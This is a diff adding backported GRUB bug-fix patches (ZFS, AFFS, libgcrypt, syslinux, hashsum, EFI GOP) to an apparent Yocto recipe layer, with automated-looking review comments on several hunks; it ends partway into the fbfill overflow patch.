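Review bot: Clamping `epbs` to 0 hides the corrupt-metadata case the commit message describes: with `blksz == 0` the function carries on and derives `blkid` and `idx` from a block size that does not exist. Rejecting the dnode is safer, for example `if (epbs < 0) return grub_error (GRUB_ERR_BAD_FS, "0-sized block");`, provided nothing acquired earlier in dnode_get needs releasing first. dnode_get starts and ends outside the hunk, so that precondition has to be checked against the full function.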
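diff --git a/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
new file mode 100644
index 0000000000..5ded5520e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
@@ -0,0 +1,121 @@
+From 83fdffc07ec4586b375ab36189f255ffbd8f99c2 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 14 Dec 2020 18:54:49 -0300
+Subject: [PATCH] zfs: Fix resource leaks while constructing path
+
+There are several exit points in dnode_get_path() that are causing possible
+memory leaks.
+
+In the while(1) the correct exit mechanism should not be to do a direct return,
+but to instead break out of the loop, setting err first if it is not already set.
+
+The reason behind this is that the dnode_path is a linked list, and while doing
+through this loop, it is being allocated and built up - the only way to
+correctly unravel it is to traverse it, which is what is being done at the end
+of the function outside of the loop.
+
+Several of the existing exit points correctly did a break, but not all so this
+change makes that more consistent and should resolve the leaking of memory as
+found by Coverity.
+
+Fixes: CID 73741
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=89bdab965805e8d54d7f75349024e1a11cbe2eb8]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 30 +++++++++++++++++++++---------
+ 1 file changed, 21 insertions(+), 9 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 0c42cba..9087a72 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2836,8 +2836,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+
+ if (dnode_path->dn.dn.dn_type != DMU_OT_DIRECTORY_CONTENTS)
+ {
+- grub_free (path_buf);
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++ err = grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++ break;
+ }
+ err = zap_lookup (&(dnode_path->dn), cname, &objnum,
+ data, subvol->case_insensitive);
+@@ -2879,11 +2879,18 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ << SPA_MINBLOCKSHIFT);
+
+ if (blksz == 0)
+- return grub_error(GRUB_ERR_BAD_FS, "0-sized block");
++ {
++ err = grub_error (GRUB_ERR_BAD_FS, "0-sized block");
++ break;
++ }
+
+ sym_value = grub_malloc (sym_sz);
+ if (!sym_value)
+- return grub_errno;
++ {
++ err = grub_errno;
++ break;
++ }
++
+ for (block = 0; block < (sym_sz + blksz - 1) / blksz; block++)
+ {
+ void *t;
+@@ -2893,7 +2900,7 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ if (err)
+ {
+ grub_free (sym_value);
+- return err;
++ break;
+ }
+
+ movesize = sym_sz - block * blksz;
+@@ -2903,6 +2910,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ grub_memcpy (sym_value + block * blksz, t, movesize);
+ grub_free (t);
+ }
++ if (err)
++ break;
+ free_symval = 1;
+ }
+ path = path_buf = grub_malloc (sym_sz + grub_strlen (oldpath) + 1);
+@@ -2911,7 +2920,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ grub_free (oldpathbuf);
+ if (free_symval)
+ grub_free (sym_value);
+- return grub_errno;
++ err = grub_errno;
++ break;
+ }
+ grub_memcpy (path, sym_value, sym_sz);
+ if (free_symval)
+@@ -2949,11 +2959,12 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+
+ err = zio_read (bp, dnode_path->dn.endian, &sahdrp, NULL, data);
+ if (err)
+- return err;
++ break;
+ }
+ else
+ {
+- return grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++ err = grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++ break;
+ }
+
+ hdrsize = SA_HDR_SIZE (((sa_hdr_phys_t *) sahdrp));
+@@ -2974,7 +2985,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ if (!path_buf)
+ {
+ grub_free (oldpathbuf);
+- return grub_errno;
++ err = grub_errno;
++ break;
+ }
+ grub_memcpy (path, sym_value, sym_sz);
+ path [sym_sz] = 0;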
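Review bot: The rule this change depends on lives only in the commit message: leave the `while (1)` loop in dnode_get_path only through `break` with `err` set, so the `dnode_path` list is unwound after the loop. A comment at the top of the loop, such as `/* Do not return from inside this loop: set err and break so dnode_path is freed below. */`, would stop a later edit from reintroducing a direct `return`. The cleanup code is outside these hunks, so whether `path_buf`, which the "not a directory" path used to free explicitly, is released there could not be checked here.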
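diff --git a/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
new file mode 100644
index 0000000000..8df758b41f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
@@ -0,0 +1,56 @@
+From ec35d862f3567671048aa0d0d8ad1ded1fd25336 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 22:17:04 +0000
+Subject: [PATCH] zfs: Fix possible integer overflows
+
+In all cases the problem is that the value being acted upon by
+a left-shift is a 32-bit number which is then being used in the
+context of a 64-bit number.
+
+To avoid overflow we ensure that the number being shifted is 64-bit
+before the shift is done.
+
+Fixes: CID 73684, CID 73695, CID 73764
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=302c12ff5714bc455949117c1c9548ccb324d55b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 9087a72..b078ccc 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -564,7 +564,7 @@ find_bestub (uberblock_phys_t * ub_array,
+ ubptr = (uberblock_phys_t *) ((grub_properly_aligned_t *) ub_array
+ + ((i << ub_shift)
+ / sizeof (grub_properly_aligned_t)));
+- err = uberblock_verify (ubptr, offset, 1 << ub_shift);
++ err = uberblock_verify (ubptr, offset, (grub_size_t) 1 << ub_shift);
+ if (err)
+ {
+ grub_errno = GRUB_ERR_NONE;
+@@ -1543,7 +1543,7 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+
+ high = grub_divmod64 ((offset >> desc->ashift) + c,
+ desc->n_children, &devn);
+- csize = bsize << desc->ashift;
++ csize = (grub_size_t) bsize << desc->ashift;
+ if (csize > len)
+ csize = len;
+
+@@ -1635,8 +1635,8 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+
+ while (len > 0)
+ {
+- grub_size_t csize;
+- csize = ((s / (desc->n_children - desc->nparity))
++ grub_size_t csize = s;
++ csize = ((csize / (desc->n_children - desc->nparity))
+ << desc->ashift);
+ if (csize > len)
+ csize = len;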
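Review bot: The casts go to `grub_size_t`, not to a 64-bit type as the commit message states, and `grub_size_t` is pointer-sized in GRUB, so on 32-bit targets `(grub_size_t) 1 << ub_shift` and `(grub_size_t) bsize << desc->ashift` remain 32-bit shifts. If the overflow matters on those targets, the shift should be done in `grub_uint64_t` and the result range-checked before it is narrowed into `csize`. None of the three hunks bounds `ub_shift` or `desc->ashift`; whether they are validated when read from disk is outside the view.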
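diff --git a/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
new file mode 100644
index 0000000000..555dc19168
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
@@ -0,0 +1,35 @@
+From b085da8efda9b81f94aa197ee045226563554fdf Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:56:45 +0000
+Subject: [PATCH] zfsinfo: Correct a check for error allocating memory
+
+While arguably the check for grub_errno is correct, we should really be
+checking the return value from the function since it is always possible
+that grub_errno was set elsewhere, making this code behave incorrectly.
+
+Fixes: CID 73668
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7aab03418ec6a9b991aa44416cb2585aff4e7972]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfsinfo.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfsinfo.c b/grub-core/fs/zfs/zfsinfo.c
+index c8a28ac..bf29180 100644
+--- a/grub-core/fs/zfs/zfsinfo.c
++++ b/grub-core/fs/zfs/zfsinfo.c
+@@ -358,8 +358,8 @@ grub_cmd_zfs_bootfs (grub_command_t cmd __attribute__ ((unused)), int argc,
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("one argument expected"));
+
+ devname = grub_file_get_device_name (args[0]);
+- if (grub_errno)
+- return grub_errno;
++ if (devname == NULL)
++ return GRUB_ERR_OUT_OF_MEMORY;
+
+ dev = grub_device_open (devname);
+ grub_free (devname);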
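Review bot: The new failure path returns a bare `GRUB_ERR_OUT_OF_MEMORY` without going through `grub_error`, unlike the `grub_error (GRUB_ERR_BAD_ARGUMENT, ...)` return just above it, so no message is recorded and `grub_errno` may not match the returned code. It also assumes that NULL from `grub_file_get_device_name` always means allocation failure; if that helper can return NULL for a name with no device part (its definition is not visible here), such input now fails where it previously reached `grub_device_open`. Consider `if (devname == NULL && grub_errno != GRUB_ERR_NONE) return grub_errno;`, or a comment stating why NULL can only mean out of memory.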
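diff --git a/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
new file mode 100644
index 0000000000..435130516c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
@@ -0,0 +1,82 @@
+From 929c2ce8214c53cb95abff57a89556cd18444097 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:48:07 +0000
+Subject: [PATCH] affs: Fix memory leaks
+
+The node structure reference is being allocated but not freed if it
+reaches the end of the function. If any of the hooks had returned
+a non-zero value, then node would have been copied in to the context
+reference, but otherwise node is not stored and should be freed.
+
+Similarly, the call to grub_affs_create_node() replaces the allocated
+memory in node with a newly allocated structure, leaking the existing
+memory pointed by node.
+
+Finally, when dir->parent is set, then we again replace node with newly
+allocated memory, which seems unnecessary when we copy in the values
+from dir->parent immediately after.
+
+Fixes: CID 73759
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=178ac5107389f8e5b32489d743d6824a5ebf342a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/affs.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/grub-core/fs/affs.c b/grub-core/fs/affs.c
+index 220b371..230e26a 100644
+--- a/grub-core/fs/affs.c
++++ b/grub-core/fs/affs.c
+@@ -400,12 +400,12 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ {
+ unsigned int i;
+ struct grub_affs_file file;
+- struct grub_fshelp_node *node = 0;
++ struct grub_fshelp_node *node, *orig_node;
+ struct grub_affs_data *data = dir->data;
+ grub_uint32_t *hashtable;
+
+ /* Create the directory entries for `.' and `..'. */
+- node = grub_zalloc (sizeof (*node));
++ node = orig_node = grub_zalloc (sizeof (*node));
+ if (!node)
+ return 1;
+
+@@ -414,9 +414,6 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ return 1;
+ if (dir->parent)
+ {
+- node = grub_zalloc (sizeof (*node));
+- if (!node)
+- return 1;
+ *node = *dir->parent;
+ if (hook ("..", GRUB_FSHELP_DIR, node, hook_data))
+ return 1;
+@@ -456,17 +453,18 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+
+ if (grub_affs_create_node (dir, hook, hook_data, &node, &hashtable,
+ next, &file))
+- return 1;
++ {
++ /* Node has been replaced in function. */
++ grub_free (orig_node);
++ return 1;
++ }
+
+ next = grub_be_to_cpu32 (file.next);
+ }
+ }
+
+- grub_free (hashtable);
+- return 0;
+-
+ fail:
+- grub_free (node);
++ grub_free (orig_node);
+ grub_free (hashtable);
+ return 0;
+ }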
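Review bot: After this change the single `orig_node` allocation is overwritten with `*dir->parent`, handed to the `..` hook, and then freed at `fail:`; the unchanged code between the first two hunks appears to pass the same buffer to an earlier hook as well. That is only safe if a hook that returns 0 neither keeps nor frees the pointer it was given; if hooks take ownership of `node` (their contract is not visible in these hunks), the reuse and the final `grub_free (orig_node)` would touch memory this function no longer owns. The early `return 1` paths after the hooks skip `fail:`, which the commit message justifies by the hook having stored `node`; a comment stating that ownership rule next to the allocation would make it checkable. grub_affs_iterate_dir is only partly shown, so the state of `hashtable` on each path could not be confirmed.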
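diff --git a/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
new file mode 100644
index 0000000000..f500f1a296
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
@@ -0,0 +1,36 @@
+From 9b16d7bcad1c7fea7f26eb2fb3af1a5ca70ba34e Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 3 Nov 2020 16:43:37 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible unintended sign extension
+
+The array of unsigned char gets promoted to a signed 32-bit int before
+it is finally promoted to a size_t. There is the possibility that this
+may result in the signed-bit being set for the intermediate signed
+32-bit int. We should ensure that the promotion is to the correct type
+before we bitwise-OR the values.
+
+Fixes: CID 96697
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e8814c811132a70f9b55418f7567378a34ad3883]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index a3435ed..7ecad27 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -458,7 +458,7 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+ if (len && len < 4)
+ return gcry_error (GPG_ERR_TOO_SHORT);
+
+- n = (s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3]);
++ n = ((size_t)s[0] << 24 | (size_t)s[1] << 16 | (size_t)s[2] << 8 | (size_t)s[3]);
+ s += 4;
+ if (len)
+ len -= 4;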
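diff --git a/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
new file mode 100644
index 0000000000..08299d021e
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
@@ -0,0 +1,33 @@
+From d26c8771293637b0465f2cb67d97cb58bacc62da Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:41:54 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible NULL dereference
+
+The code in gcry_mpi_scan() assumes that buffer is not NULL, but there
+is no explicit check for that, so we add one.
+
+Fixes: CID 73757
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ae0f3fabeba7b393113d5dc185b6aff9b728136d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index 7ecad27..6fe3891 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -379,6 +379,9 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+ unsigned int len;
+ int secure = (buffer && gcry_is_secure (buffer));
+
++ if (!buffer)
++ return gcry_error (GPG_ERR_INV_ARG);
++
+ if (format == GCRYMPI_FMT_SSH)
+ len = 0;
+ else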
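--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
@@ -0,0 +1,43 @@
+From ea12feb69b6af93c7e2fa03df7ac3bd1f4edd599 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 15:31:53 +0000
+Subject: [PATCH] syslinux: Fix memory leak while parsing
+
+In syslinux_parse_real() the 2 points where return is being called
+didn't release the memory stored in buf which is no longer required.
+
+Fixes: CID 176634
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=95bc016dba94cab3d398dd74160665915cd08ad6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/syslinux_parse.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/syslinux_parse.c b/grub-core/lib/syslinux_parse.c
+index 4afa992..3acc6b4 100644
+--- a/grub-core/lib/syslinux_parse.c
++++ b/grub-core/lib/syslinux_parse.c
+@@ -737,7 +737,10 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ && grub_strncasecmp ("help", ptr3, ptr4 - ptr3) == 0))
+ {
+ if (helptext (ptr5, file, menu))
+- return 1;
++ {
++ grub_free (buf);
++ return 1;
++ }
+ continue;
+ }
+
+@@ -757,6 +760,7 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ }
+ fail:
+ grub_file_close (file);
++ grub_free (buf);
+ return err;
+ }
+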
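Review bot: The new early return in the `helptext` branch frees `buf` but, unlike the `fail:` path in the second hunk, does not call `grub_file_close (file)`, so unless `helptext()` closes the file itself the handle still leaks on that path. Routing it through the common exit would keep the cleanup in one place, e.g. `{ err = 1; goto fail; }`, provided `err` can carry that value; its declaration is outside the hunks. syslinux_parse_real's body starts before the first hunk.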
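--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
@@ -0,0 +1,52 @@
+From 2367049d2021e00d82d19cee923e06a4b04ebc30 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 18:56:48 +0000
+Subject: [PATCH] normal/completion: Fix leaking of memory when processing a
+ completion
+
+It is possible for the code to reach the end of the function without
+freeing the memory allocated to argv and argc still to be 0.
+
+We should always call grub_free(argv). The grub_free() will handle
+a NULL argument correctly if it reaches that code without the memory
+being allocated.
+
+Fixes: CID 96672
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9213575b7a95b514bce80be5964a28d407d7d56d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/normal/completion.c | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/normal/completion.c b/grub-core/normal/completion.c
+index 5961028..46e473c 100644
+--- a/grub-core/normal/completion.c
++++ b/grub-core/normal/completion.c
+@@ -400,8 +400,8 @@ char *
+ grub_normal_do_completion (char *buf, int *restore,
+ void (*hook) (const char *, grub_completion_type_t, int))
+ {
+- int argc;
+- char **argv;
++ int argc = 0;
++ char **argv = NULL;
+
+ /* Initialize variables. */
+ match = 0;
+@@ -516,10 +516,8 @@ grub_normal_do_completion (char *buf, int *restore,
+
+ fail:
+ if (argc != 0)
+- {
+- grub_free (argv[0]);
+- grub_free (argv);
+- }
++ grub_free (argv[0]);
++ grub_free (argv);
+ grub_free (match);
+ grub_errno = GRUB_ERR_NONE;
+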
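Review bot: With the braces dropped at `fail:`, `grub_free (argv[0])` stays conditional on `argc != 0` while `grub_free (argv)` becomes unconditional, and nothing next to the two calls says that is deliberate; a reader can easily take both to be under the `if`. A short comment above the second call, such as `/* argv may still be NULL here; grub_free() accepts NULL. */`, would record the intent. The guard also relies on `argc` being non-zero only when `argv` points to a valid array, which is established by code between the two hunks and not visible here.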
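--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
@@ -0,0 +1,56 @@
+From b136fa14d26d1833ffcb852f86e65da5960cfb99 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
+Date: Tue, 1 Dec 2020 23:41:24 +0000
+Subject: [PATCH] commands/hashsum: Fix a memory leak
+
+check_list() uses grub_file_getline(), which allocates a buffer.
+If the hash list file contains invalid lines, the function leaks
+this buffer when it returns an error.
+
+Fixes: CID 176635
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b6f528e52e18b7a69f90b8dc3671d7b1147d9f3]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hashsum.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hashsum.c b/grub-core/commands/hashsum.c
+index 456ba90..b8a22b0 100644
+--- a/grub-core/commands/hashsum.c
++++ b/grub-core/commands/hashsum.c
+@@ -128,11 +128,17 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+ high = hextoval (*p++);
+ low = hextoval (*p++);
+ if (high < 0 || low < 0)
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ {
++ grub_free (buf);
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ }
+ expected[i] = (high << 4) | low;
+ }
+ if ((p[0] != ' ' && p[0] != '\t') || (p[1] != ' ' && p[1] != '\t'))
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ {
++ grub_free (buf);
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ }
+ p += 2;
+ if (prefix)
+ {
+@@ -140,7 +146,10 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+
+ filename = grub_xasprintf ("%s/%s", prefix, p);
+ if (!filename)
+- return grub_errno;
++ {
++ grub_free (buf);
++ return grub_errno;
++ }
+ file = grub_file_open (filename, GRUB_FILE_TYPE_TO_HASH
+ | (!uncompress ? GRUB_FILE_TYPE_NO_DECOMPRESS
+ : GRUB_FILE_TYPE_NONE));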
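Review bot: The same `grub_free (buf); return ...;` pair is now repeated on three error paths in check_list(), so any error return added to this loop later has to remember it again. A single cleanup label that the error paths jump to would be less fragile, and it would also be the natural place to release anything else the function holds at that point. Whether the hash list file opened from `hashfilename` is closed on these returns cannot be seen from the hunks; check_list's body starts before the first hunk and continues after the last.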
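--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
@@ -0,0 +1,94 @@
+From 2a1e5659763790201a342f8a897c8c9d8d91b1cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:14:31 +0000
+Subject: [PATCH] video/efi_gop: Remove unnecessary return value of
+ grub_video_gop_fill_mode_info()
+
+The return value of grub_video_gop_fill_mode_info() is never able to be
+anything other than GRUB_ERR_NONE. So, rather than continue to return
+a value and checking it each time, it is more correct to redefine the
+function to not return anything and remove checks of its return value
+altogether.
+
+Fixes: CID 96701
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fc5951d3b1616055ef81a019a5affc09d13344d0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/efi_gop.c | 25 ++++++-------------------
+ 1 file changed, 6 insertions(+), 19 deletions(-)
+
+diff --git a/grub-core/video/efi_gop.c b/grub-core/video/efi_gop.c
+index 7f9d1c2..db2ee98 100644
+--- a/grub-core/video/efi_gop.c
++++ b/grub-core/video/efi_gop.c
+@@ -227,7 +227,7 @@ grub_video_gop_fill_real_mode_info (unsigned mode,
+ return GRUB_ERR_NONE;
+ }
+
+-static grub_err_t
++static void
+ grub_video_gop_fill_mode_info (unsigned mode,
+ struct grub_efi_gop_mode_info *in,
+ struct grub_video_mode_info *out)
+@@ -252,8 +252,6 @@ grub_video_gop_fill_mode_info (unsigned mode,
+ out->blit_format = GRUB_VIDEO_BLIT_FORMAT_BGRA_8888;
+ out->mode_type |= (GRUB_VIDEO_MODE_TYPE_DOUBLE_BUFFERED
+ | GRUB_VIDEO_MODE_TYPE_UPDATING_SWAP);
+-
+- return GRUB_ERR_NONE;
+ }
+
+ static int
+@@ -266,7 +264,6 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ grub_efi_uintn_t size;
+ grub_efi_status_t status;
+ struct grub_efi_gop_mode_info *info = NULL;
+- grub_err_t err;
+ struct grub_video_mode_info mode_info;
+
+ status = efi_call_4 (gop->query_mode, gop, mode, &size, &info);
+@@ -277,12 +274,7 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ continue;
+ }
+
+- err = grub_video_gop_fill_mode_info (mode, info, &mode_info);
+- if (err)
+- {
+- grub_errno = GRUB_ERR_NONE;
+- continue;
+- }
++ grub_video_gop_fill_mode_info (mode, info, &mode_info);
+ if (hook (&mode_info, hook_arg))
+ return 1;
+ }
+@@ -466,13 +458,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+
+ info = gop->mode->info;
+
+- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+- &framebuffer.mode_info);
+- if (err)
+- {
+- grub_dprintf ("video", "GOP: couldn't fill mode info\n");
+- return err;
+- }
++ grub_video_gop_fill_mode_info (gop->mode->mode, info,
++ &framebuffer.mode_info);
+
+ framebuffer.ptr = (void *) (grub_addr_t) gop->mode->fb_base;
+ framebuffer.offscreen
+@@ -486,8 +473,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+ {
+ grub_dprintf ("video", "GOP: couldn't allocate shadow\n");
+ grub_errno = 0;
+- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+- &framebuffer.mode_info);
++ grub_video_gop_fill_mode_info (gop->mode->mode, info,
++ &framebuffer.mode_info);
+ buffer = framebuffer.ptr;
+ }
+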
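--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
@@ -0,0 +1,78 @@
+From 99ecf5a44b99d529a6405fe276bedcefa3657a0a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 15:10:51 +0000
+Subject: [PATCH] video/fb/fbfill: Fix potential integer overflow
+
+The multiplication of 2 unsigned 32-bit integers may overflow before
+promotion to unsigned 64-bit. We should ensure that the multiplication
+is done with overflow detection. Additionally, use grub_sub() for
+subtraction.
+
+Fixes: CID 73640, CID 73697, CID 73702, CID 73823
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
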